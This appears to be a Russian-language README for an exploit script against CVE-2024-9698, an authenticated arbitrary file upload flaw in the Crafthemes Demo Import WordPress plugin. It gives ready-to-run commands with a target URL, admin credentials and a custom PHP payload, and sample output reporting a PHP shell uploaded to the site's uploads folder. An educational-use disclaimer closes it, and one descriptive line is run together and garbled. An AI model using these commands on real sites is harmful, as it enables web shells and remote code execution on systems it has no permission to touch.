
Crafthemes Demo Import <= 3.3 - Аутентифицированный (Администратор+) Произвольная загрузка файлов в process_uploaded_files
Этот эксплойт нацелен на критическую уязвимость (CVE-2024-9698) в плагине Crafthemes Demo Import для WordPress. Уязвимость позволяет аутентифицированным администраторам загружать произвольные файлы на уязвимый сайт WordPress, что может привести к удаленному выполнению кода (RCE).
process_uploaded_filesreadme.txt.admin-ajax.php для загрузки пользовательской PHP-оболочки.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
Если вы хотите загрузить пользовательскую PHP-нагрузку, используйте:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
Отказ от ответственности: Этот скрипт предназначен только для образовательных целей и исследований в области безопасности. Несанкционированное использование против систем без явного разрешения является незаконным.